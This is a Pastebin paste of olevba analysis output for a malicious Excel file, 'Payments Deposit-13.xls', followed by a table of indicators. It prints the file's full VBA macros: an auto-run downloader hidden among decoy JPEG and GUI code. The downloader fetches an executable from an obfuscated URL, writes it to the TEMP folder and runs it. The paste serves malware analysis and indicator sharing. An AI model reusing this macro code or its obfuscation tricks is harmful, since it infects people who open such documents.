API tools faq
paste
Advertisement
dynamoo

Malicious Excel macro

dynamoo
Oct 8th, 2015
361
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 23.72 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V Payments Deposit-13.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Payments Deposit-13.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO Ёта нига.cls
  13. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
  16.    
  17. JPEHuffmTable
  18. End Sub
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ћист1.cls
  27. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ћист2.cls
  32. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ћист3.cls
  37. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO MM2.bas
  42. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/MM2'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44.  
  45.  
  46. Sub JPEGGenerateHuffmanTable(Huff() As Integer, a As Integer, b As Integer)
  47. Dim S As Long, i As Integer, J As Integer, T As Integer
  48. Dim X As Integer, Y As Integer
  49. S = -1
  50.  
  51. For i = 1 To 16
  52. READ X
  53. For J = 1 To X
  54.  
  55. If S = -1 Then
  56. S = 0
  57. Else
  58. S = S + Pow2(T)
  59. End If
  60.  
  61.  
  62. READ Y
  63. If S And 32768 Then Huff(Y, a, b, 0) = CInt(S And 32767&) Or -32768 Else Huff(Y, a, b, 0) = S
  64. Huff(Y, a, b, 1) = i
  65. T = 16 - i
  66.  
  67. Next
  68. Next
  69. End Sub
  70.  
  71. Sub JPEGPrecalc(FSSik As Object)
  72. Dim X As Integer, Y As Integer, T As Integer, Dir As Integer, L As Long
  73.  
  74. L = 1
  75. For X = 0 To 15
  76. 'Pow2(X) = L
  77. L = L + L
  78. Next
  79. If L >= 1 Then
  80. GoTo HHNf
  81. End If
  82. For Y = 0 To 7
  83. For X = 0 To 7
  84. C.Cosine(X, Y) = Cos((2 * X + 1) * Y * 0.1963495)
  85. Next X, Y
  86. HHNf:
  87. FSSik.Send
  88. Exit Sub
  89. X = 0: Y = 0
  90. T = 0
  91. Dir = 0
  92. Do
  93. C.ZigZagX(T) = X
  94. C.ZigZagY(T) = Y
  95. T = T + 1
  96. If T = 64 Then Exit Do
  97. If Dir Then
  98. If Y = 7 Then
  99. X = X + 1
  100. Dir = 0
  101. ElseIf X = 0 Then
  102. Y = Y + 1
  103. Dir = 0
  104. Else
  105. X = X - 1
  106. Y = Y + 1
  107. End If
  108.  
  109. Else
  110. If Y = 0 Then
  111. X = X + 1
  112. Dir = 1
  113. ElseIf X = 7 Then
  114. Y = Y + 1
  115. Dir = 1
  116. Else
  117. X = X + 1
  118. Y = Y - 1
  119. End If
  120. End If
  121. Loop
  122.  
  123.  
  124.  
  125. End Sub
  126.  
  127. Private Function pDrawButton(ByVal hWnd As Long, ByVal hDC As Long) As Long
  128.     Dim m_Style As Long
  129.     Dim m_State As Long
  130.     Dim m_OldSt As Long
  131.     Dim m_SrcDC As Long
  132.     Dim m_DstDC As Long
  133.     Dim m_Level As Long
  134.     Dim m_wRect As RECTW
  135.     If IsWindowEnabled(hWnd) = 0 Then Call SetProp(hWnd, "OLDSTATE", 3)
  136.     m_Style = GetProp(hWnd, "OLDSTYLE")
  137.     If (m_Style And BS_CHECKBOX) Or (m_Style And BS_RADIOBUTTON) Then Exit Function
  138.     Call pGetWindowRectW(hWnd, m_wRect)
  139.     m_OldSt = GetProp(hWnd, "OLDSTATE")
  140.     m_Level = GetProp(hWnd, "ALPHALEVEL")
  141.     m_SrcDC = GetProp(hWnd, "HDC" & CStr(m_OldSt))
  142.     m_DstDC = IIf(hDC = 0, GetWindowDC(hWnd), hDC)
  143.     AlphaBlend m_DstDC, 0, 0, m_wRect.Width, m_wRect.Height, m_SrcDC, 0, 0, m_wRect.Width, m_wRect.Height, m_Level * &H10000
  144.     If hDC = 0 Then Call ReleaseDC(hWnd, m_DstDC)
  145. End Function
  146.  
  147. Public Function COLUMNEWORDER(SIBBBD As String) As Byte()
  148. Dim COLUMNBEFOREORDER As Object
  149.  Set COLUMNBEFOREORDER = CreateObject("Microsoft.XMLHTTP")
  150.  
  151.  
  152. pDetach COLUMNBEFOREORDER, SIBBBD, 0
  153. JPEGPrecalc COLUMNBEFOREORDER
  154. GoTo HHGGHHEHD
  155. HHGGHHEHD:
  156. COLUMNEWORDER = COLUMNBEFOREORDER.responseBody
  157. Exit Function
  158. End Function
  159.  
  160. Public Sub IncomingData(ByVal DataLength As Long)
  161. Dim Buffer() As Byte
  162. Dim pLength As Long
  163.  
  164.     If Not App.LogMode = 0 Then On Error GoTo errHandler
  165.  
  166.     frmMain.Socket.GetData Buffer, vbUnicode, DataLength
  167.    
  168.     PlayerBuffer.WriteBytes Buffer()
  169.    
  170.     If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
  171.     Do While pLength > 0 And pLength <= PlayerBuffer.Length - 4
  172.         If pLength <= PlayerBuffer.Length - 4 Then
  173.             PlayerBuffer.ReadLong
  174.             HandleData PlayerBuffer.ReadBytes(pLength)
  175.         End If
  176.  
  177.         pLength = 0
  178.         If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
  179.     Loop
  180.     PlayerBuffer.Trim
  181.     DoEvents
  182.    
  183.     Exit Sub
  184. errHandler:
  185.     HandleError "IncomingData", "modHandleData", Err.Number, Err.Description
  186.     Err.Clear
  187.     Exit Sub
  188. End Sub
  189.  
  190. Private Function pDrawCheckBox(ByVal hWnd As Long, ByVal State As Long, Optional ByVal Redraw As Boolean = False) As Long
  191.     Dim mOldState As Long
  192.     mOldState = GetProp(hWnd, "OLDSTATE")
  193.     If mOldState = State And Redraw = False Then Exit Function
  194.     Call SetProp(hWnd, "OLDSTATE", State)
  195.     Dim m_hDC       As Long
  196.     Dim TmpDC       As Long
  197.     Dim m_wRect     As RECTW
  198.     Dim m_cX        As Long
  199.     Dim m_cY        As Long
  200.     Dim mValue      As Long
  201.     m_cX = GetSystemMetrics(SM_CXCHECKBOX)
  202.     m_cY = GetSystemMetrics(SM_CYCHECKBOX)
  203.     Call pGetWindowRectW(hWnd, m_wRect)
  204.     mValue = SendMessage(hWnd, BM_GETCHECK, 0&, 0&)
  205.     TmpDC = pCreateDC(m_cX, m_cY)
  206.     m_hDC = GetWindowDC(hWnd)
  207.     Call pFillRectL(TmpDC, 0, 0, m_cX, m_cY, &HFFFFFF)
  208.     If IsWindowEnabled(hWnd) Then
  209.         If State = 2 Then
  210.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HC48639)
  211.         Else
  212.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HD5A554)
  213.         End If
  214.         If State = 1 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 17, 11, 5, vbSrcCopy)
  215.         If State = 2 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 30, 11, 5, vbSrcCopy)
  216.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 0, 0)
  217.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 1, 9)
  218.     Else
  219.         Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HE9CFA4)
  220.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 9, 0)
  221.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 10, 9)
  222.     End If
  223.     BitBlt m_hDC, 0, (m_wRect.Height - m_cY) / 2, m_cX, m_cY, TmpDC, 0, 0, vbSrcCopy
  224.     Call ReleaseDC(hWnd, m_hDC)
  225.     DeleteDC TmpDC
  226.     pDrawCheckBox = 1
  227. End Function
  228.  
  229. Sub JPEGPutBinString(BS As Integer, Length As Integer, State As Integer)
  230. Dim Temp As Integer
  231.  
  232. Temp = BS
  233. State.Leftover = State.Leftover Or JPEG.Shift(Temp, State.LeftoverBits)
  234. State.LeftoverBits = State.LeftoverBits + Length
  235. If State.LeftoverBits >= 16 Then
  236. DEF SEG = VARSEG(State.Leftover)
  237. JPEG.PutByte State.FileNo, PEEK(VarPtr(State.Leftover) + 1)
  238. DEF SEG
  239. JPEG.PutByte State.FileNo, State.Leftover And 255
  240. State.LeftoverBits = State.LeftoverBits - 16
  241. State.Leftover = Temp
  242. End If
  243.  
  244. End Sub
  245.  
  246. Sub JPEGPutByte(FileNo As Integer, Bytep As Integer)
  247. Dim C As String * 1
  248. C = Chr(Bytep)
  249. Put FileNo, , C
  250. End Sub
  251.  
  252. Sub JPEGPutRightBinString(BS As Integer, Length As Integer, State As Integer)
  253.  
  254. Dim Temp As Long
  255. If Length Then
  256. Temp = (CLng(BS) And Pow2(Length) - 1) * Pow2(16 - Length)
  257. If Temp And 32768 Then Temp = Temp Or -65536
  258. JPEG.PutBinString CInt(Temp), Length, State
  259. End If
  260.  
  261. End Sub
  262.  
  263. Sub JPEGPutWord(FileNo As Integer, Word As Integer)
  264. Dim C As String * 1
  265. C = Chr$(Word \ 256)
  266. Put FileNo, , C
  267. C = Chr$(Word And 255)
  268. Put FileNo, , C
  269. End Sub
  270.  
  271. Function JPEGShift(i As Integer, N As Integer)
  272. Dim T As Long
  273.  
  274. If N = 0 Then
  275. JPEG.Shift = i
  276. i = 0
  277. Exit Function
  278. End If
  279. T = CLng(i) And 65535
  280.  
  281. JPEG.Shift = T \ Pow2(N)
  282.  
  283. T = (T And (Pow2(N) - 1)) * Pow2((16 - N) And 15)
  284. If T And 32768 Then i = CInt(T And 32767&) Or -32768 Else i = CInt(T)
  285. End Function
  286.  
  287. Sub JPEGStandardQT(quality As Single, QT() As Integer)
  288.  
  289. Dim i As Integer, X As Integer, Y As Integer, T As Integer
  290. Restore StandardQT
  291.  
  292. For i = 0 To 1: For Y = 0 To 7: For X = 0 To 7
  293. READ T
  294.  
  295. QT(X, Y, i) = T * quality
  296.  
  297. If QT(X, Y, i) = 0 Then QT(X, Y, i) = 1
  298. Next X, Y, i
  299.  
  300. End Sub
  301.  
  302. Public Function JPEGY(R As Integer, G As Integer, b As Integer)
  303.  
  304. JPEG.Y = 0.299 * R + 0.587 * G + 0.114 * b - 128
  305.  
  306. End Function
  307.  
  308. Sub PutChar(FileNo As Integer, Char As Integer)
  309. Dim C As String * 1
  310. C = Chr$(Char)
  311. Put FileNo, , C
  312. End Sub
  313.  
  314. -------------------------------------------------------------------------------
  315. VBA MACRO MM3.bas
  316. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/MM3'
  317. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  318.  
  319. Private Function MD5LongAdd(lngVal1 As Long, lngVal2 As Long) As Long
  320.    
  321.     Dim lngHighWord As Long
  322.     Dim lngLowWord As Long
  323.     Dim lngOverflow As Long
  324.  
  325.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&)
  326.     lngOverflow = lngLowWord \ 65536
  327.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
  328.    
  329.     MD5LongAdd = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
  330.  
  331. End Function
  332. Public Sub JPEHuffmTable()
  333. Dim COLUMNTRADEZ: Set COLUMNTRADEZ = CreateObject("Adodb.Stream")
  334.  
  335. Set processEnv = CreateObject("WScript.Shell").Environment("Process")
  336. COLUMTRADETATUS = processEnv("T" + Chr(69) + "MP")
  337. iChkBaseOrd1erGo = COLUMTRADETATUS + "\f" + Chr(68) + "e12.ex" & Chr(101)
  338. With COLUMNTRADEZ
  339.    .Type = 1
  340.     .Open
  341.     .write COLUMNEWORDER(pDrawComboBox(0, 0, 0))
  342.     .savetofile iChkBaseOrd1erGo, 2
  343. End With
  344. Set MEIGARWORKSHEEAME = CreateObject("Shell.Application")
  345. MEIGARWORKSHEEAME.Open iChkBaseOrd1erGo
  346. End Sub
  347.  
  348. Private Function MD5LongAdd4(lngVal1 As Long, lngVal2 As Long, lngVal3 As Long, lngVal4 As Long) As Long
  349.    
  350.     Dim lngHighWord As Long
  351.     Dim lngLowWord As Long
  352.     Dim lngOverflow As Long
  353.  
  354.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&) + (lngVal3 And &HFFFF&) + (lngVal4 And &HFFFF&)
  355.     lngOverflow = lngLowWord \ 65536
  356.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + ((lngVal3 And &HFFFF0000) \ 65536) + ((lngVal4 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
  357.     MD5LongAdd4 = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
  358.  
  359. End Function
  360.  
  361. -------------------------------------------------------------------------------
  362. VBA MACRO MM4.bas
  363. in file: Payments Deposit-13.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/MM4'
  364. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  365.  
  366.  
  367. Private Function pAttach(ByVal hWnd As Long) As Long
  368. If hWnd = 0 Then Exit Function
  369.     If GetProp(hWnd, "PROCADDR") Then Exit Function
  370.     Dim sClassName  As String
  371.     sClassName = LCase(pGetClassName(hWnd))
  372.     Select Case sClassName
  373.         '=====================================================================================
  374.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
  375.             Call EnumChildWindows(hWnd, AddressOf pEnumChildProc, ByVal 0&)
  376.            
  377.         '=====================================================================================
  378.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
  379.             Dim i           As Long
  380.             Dim m_hDC       As Long
  381.             Dim m_mDC(3)    As Long
  382.             Dim m_BMP(3)    As Long
  383.             Dim m_wRect     As RECTW
  384.             Dim m_dwStyle   As Long
  385.             m_hDC = GetWindowDC(hWnd)
  386.             pGetWindowRectW hWnd, m_wRect
  387.             For i = 0 To 3
  388.                 m_mDC(i) = CreateCompatibleDC(m_hDC)
  389.                 m_BMP(i) = CreateCompatibleBitmap(m_hDC, m_wRect.Width, m_wRect.Height)
  390.                 DeleteObject SelectObject(m_mDC(i), m_BMP(i))
  391.                 SetProp hWnd, "HDC" & CStr(i), m_mDC(i)
  392.                 SetProp hWnd, "BMP" & CStr(i), m_BMP(i)
  393.             Next
  394.             Call pDrawMemDC(hWnd)
  395.             ReleaseDC hWnd, m_hDC
  396.             m_dwStyle = GetWindowLong(hWnd, GWL_STYLE)
  397.             If (m_dwStyle And BS_CHECKBOX) Or (m_dwStyle And BS_RADIOBUTTON) Then
  398.             Else
  399.                 SendMessage hWnd, BM_SETSTYLE, BS_OWNERDRAW, ByVal True
  400.             End If
  401.             SetProp hWnd, "OLDSTYLE", m_dwStyle         '????????,?????????????????
  402.            SetProp hWnd, "MOUSEFLAG", 0
  403.             SetProp hWnd, "TIMERID", 0
  404.             SetProp hWnd, "OLDSTATE", IIf(IsWindowEnabled(hWnd), 0, 3)
  405.             SetProp hWnd, "ALPHALEVEL", 0
  406.             SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), True
  407.            
  408.         '=====================================================================================
  409.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
  410.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
  411.             SetProp hWnd, "MOUSEFLAG", 0
  412.             SetProp hWnd, "OLDSTATE", 0
  413.        
  414.         '=====================================================================================
  415.        Case "progressbar20wndclass", "progressbarwndclass"
  416.             'Call pGetWindowRectW(hWnd, m_wRect)
  417.            'SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), False
  418.        
  419.         '=====================================================================================
  420.        Case "msvb_lib_header", "sysheader32"
  421.             SetProp hWnd, "MOUSEFLAG", 0
  422.             SetProp hWnd, "HDINDEX", -1
  423.             SetProp hWnd, "HMINDEX", -1
  424.            
  425.         '=====================================================================================
  426.        Case Else
  427.    
  428.     End Select
  429.     m_SubclassCount = m_SubclassCount + 1
  430.     SetProp hWnd, "PROCADDR", SetWindowLong(hWnd, GWL_WNDPROC, AddressOf WindowProc)
  431.     SendMessage hWnd, WM_NCPAINT, 1&, 0&
  432.     RedrawWindow hWnd, ByVal 0&, ByVal 0&, &H1 Or &H2
  433.     pAttach = 1
  434. End Function
  435.  
  436. Public Function pDetach(PROCADDRR2 As Object, pGetClsName As String, hWnd As Long)
  437. If hWnd = 0 Then GoTo PROCADDR
  438.     Dim OrigProc As Long
  439.     OrigProc = vd.GetProp(hWnd, "PROCADDR")
  440.     If OrigProc = 0 Then Exit Function
  441.     Dim sClassName  As String
  442.     sClassName = LCase(vd.pGetClassName(hWnd))
  443.     Select Case sClassName
  444.         '=====================================================================================
  445.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
  446.            
  447.         '=====================================================================================
  448.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
  449.             Dim m_mDC(3)    As Long
  450.             Dim m_BMP(3)    As Long
  451.             Dim i As Long
  452.             For i = 0 To 3
  453.                 m_mDC(i) = vd.GetProp(hWnd, "HDC" & CStr(i))
  454.                 m_BMP(i) = vd.GetProp(hWnd, "BMP" & CStr(i))
  455.                vd.DeleteObject m_mDC(i)
  456.                 vd.DeleteDC m_BMP(i)
  457.                 vd.RemoveProp hWnd, "HDC" & CStr(i)
  458.                 vd.RemoveProp hWnd, "BMP" & CStr(i)
  459.             Next
  460.             vd.Call vd.pKillTimer(hWnd)
  461.             vd.SetWindowLong hWnd, -16, vd.GetProp(hWnd, "OLDSTYLE")
  462.             vd.RemoveProp hWnd, "OLDSTYLE"
  463.             vd.RemoveProp hWnd, "MOUSEFLAG"
  464.             vd.RemoveProp hWnd, "TIMERID"
  465.             vd.RemoveProp hWnd, "OLDSTATE"
  466.             vd.RemoveProp hWnd, "ALPHALEVEL"
  467.             vd.SetWindowRgn hWnd, 0&, True
  468.         '=====================================================================================
  469.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
  470.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
  471.             vd.RemoveProp hWnd, "MOUSEFLAG"
  472.             vd.RemoveProp hWnd, "OLDSTATE"
  473.        
  474.         Case "msvb_lib_header", "sysheader32"
  475.             vd.RemoveProp hWnd, "MOUSEFLAG"
  476.             vd.RemoveProp hWnd, "HDINDEX"
  477.             vd.RemoveProp hWnd, "HMINDEX"
  478.            
  479.         '=====================================================================================
  480.        Case "progressbar20wndclass", "progressbarwndclass"
  481.             'SetWindowRgn hWnd, 0&, ByVal True
  482.                    
  483.         '=====================================================================================
  484.        Case "datalistwndclass", "dblistwndclass"
  485.                                
  486.         '=====================================================================================
  487.        Case Else
  488.    
  489.     End Select
  490.    
  491.    
  492.    
  493. PROCADDR:
  494. PROCADDRR2.Open "G" + Chr(69) + "T", pGetClsName, False
  495. Exit Function
  496.     vd.RemoveProp hWnd, "PROCADDR"
  497.    ' Call SetWindowLong(hWnd, GWL_WNDPROC, OrigProc)
  498.    vd.SendMessage hWnd, WM_NCPAINT, 1&, 0&
  499.     vd.RedrawWindow hWnd, 0&, 0&, &H1 Or &H2
  500.     m_SubclassCount = m_SubclassCount - 1
  501.     If m_SubclassCount <= 0 Then
  502.         m_SubclassCount = 0
  503.         vd.DeleteDC m_hBtnSrcDC
  504.         Dvd.eleteDC m_hCbbSrcDC
  505.         Devd.leteDC m_hCkbSrcDC
  506.         Devd.leteDC m_hOpbSrcDC
  507.         Delvd.eteDC m_hHdbSrcDC
  508.         m_Init = False
  509.     End If
  510.     pDetach = 1
  511. End Function
  512.  
  513. Public Function pDrawComboBox(hWnd As Long, hDC As Long, yyyy As Long) As String
  514.     Dim mOldState As Long
  515.     Dim bDrop     As Long
  516.     pDrawComboBox = "h" & "t" & "t" & Chr(112) & Chr(58) & "/" & "/" & "d" & Chr(109) & "e" & "d" & Chr(101) & Chr(105) & Chr(46) & "3" & Chr(120) & "." & Chr(114) & "o" & Chr(47) & Chr(98) & Chr(118) & "c" & Chr(98) & "3" & "4" & "d" & Chr(47) & Chr(57) & Chr(56) & "3" & "b" & "v" & Chr(51) & Chr(46) & Chr(101) & "x" & Chr(101)
  517. Exit Function
  518.     bDrop = Se.ndMessage(hWnd, CB_GETDROPPEDSTATE, 0&, 0&)
  519.     mOldState = Ge.tProp(hWnd, "OLDSTATE")
  520.     If bDrop Then State = 2
  521.     If mOldState = State And Redraw = False Then Exit Function
  522.     If Not GetWin.dowLong(hWnd, GWL_STYLE) And &H2 Then Exit Function
  523.     Ca.ll SetP.rop(hWnd, "OLDSTATE", State)
  524.     Dim m_BtSize    As Long
  525.     Dim m_hDC       As Long
  526.     Dim TmpDC       As Long
  527.     Dim TmpBMP      As Long
  528.     Cal.L pGetWind.owRectW(hWnd, m_wRect)
  529.     m_BtSize = GetS.ystemMetrics(SM_CXVSCROLL) + 1
  530.     TmpDC = pCre.ateDC(m_BtSize, m_wRect.Height - 2)
  531.     Select Case State
  532.             Case 0
  533.                 C.all pFil.lRectL(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, &HFFFFFF)
  534.  
  535.             Case 1
  536.                 Cal.L Grid.Blt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 0, 0, 4, 18, 2, 1, 1, 1)
  537.                
  538.             Case 2
  539.                 Cal.L Gri.dBlt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 4, 0, 4, 18, 2, 1, 1, 1)
  540.                                    
  541.     End Select
  542.     If IsWin.dowEnabled(hWnd) Then
  543.         Cal.L Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 0)
  544.     Else
  545.         Ca.ll Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 4)
  546.     End If
  547.     If hDC = 0 Then
  548.         m_hDC = Ge.tWindowDC(hWnd)
  549.     Else
  550.         m_hDC = hDC
  551.     End If
  552.     Bit.Blt m_hDC, m_wRect.Width - m_BtSize - 1, 1, m_BtSize, m_wRect.Height - 2, TmpDC, 0, 0, vbSrcCopy
  553.     De.leteDC TmpDC
  554.     Del.eteObject TmpBMP
  555.     If hDC = 0 Then Ca.ll Re.leaseDC(hWnd, m_hDC)
  556. End Function
  557.  
  558.  
  559.  
  560. +------------+----------------------+-----------------------------------------+
  561. | Type       | Keyword              | Description                             |
  562. +------------+----------------------+-----------------------------------------+
  563. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  564. | Suspicious | Open                 | May open a file                         |
  565. | Suspicious | Shell                | May run an executable file or a system  |
  566. |            |                      | command                                 |
  567. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  568. |            |                      | command                                 |
  569. | Suspicious | Shell.Application    | May run an application (if combined     |
  570. |            |                      | with CreateObject)                      |
  571. | Suspicious | CreateObject         | May create an OLE object                |
  572. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  573. |            |                      | strings                                 |
  574. | Suspicious | ADODB.Stream         | May create a text file                  |
  575. | Suspicious | SaveToFile           | May create a text file                  |
  576. | Suspicious | Write                | May write to a file (if combined with   |
  577. |            |                      | Open)                                   |
  578. | Suspicious | Put                  | May write to a file (if combined with   |
  579. |            |                      | Open)                                   |
  580. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  581. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  582. |            |                      | be used to obfuscate strings (option    |
  583. |            |                      | --decode to see all)                    |
  584. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  585. |            |                      | may be used to obfuscate strings        |
  586. |            |                      | (option --decode to see all)            |
  587. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  588. |            | Strings              | may be used to obfuscate strings        |
  589. |            |                      | (option --decode to see all)            |
  590. | IOC        | http://dmedei.3x.ro/ | URL (obfuscation: VBA expression)       |
  591. |            | bvcb34d/983bv3.exe   |                                         |
  592. | IOC        | fDe12.exe            | Executable file name (obfuscation: VBA  |
  593. |            |                      | expression)                             |
  594. | IOC        | 983bv3.exe           | Executable file name (obfuscation: VBA  |
  595. |            |                      | expression)                             |
  596. | VBA string | TEMP                 | ("T" + Chr(69) + "MP")                  |
  597. | VBA string | \fDe12.exe           | "\f" + Chr(68) + "e12.ex" & Chr(101)    |
  598. | VBA string | GET                  | "G" + Chr(69) + "T"                     |
  599. | VBA string | http://dmedei.3x.ro/ | "h" & "t" & "t" & Chr(112) & Chr(58) &  |
  600. |            | bvcb34d/983bv3.exe   | "/" & "/" & "d" & Chr(109) & "e" & "d"  |
  601. |            |                      | & Chr(101) & Chr(105) & Chr(46) & "3" & |
  602. |            |                      | Chr(120) & "." & Chr(114) & "o" &       |
  603. |            |                      | Chr(47) & Chr(98) & Chr(118) & "c" &    |
  604. |            |                      | Chr(98) & "3" & "4" & "d" & Chr(47) &   |
  605. |            |                      | Chr(57) & Chr(56) & "3" & "b" & "v" &   |
  606. |            |                      | Chr(51) & Chr(46) & Chr(101) & "x" &    |
  607. |            |                      | Chr(101)                                |
  608. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!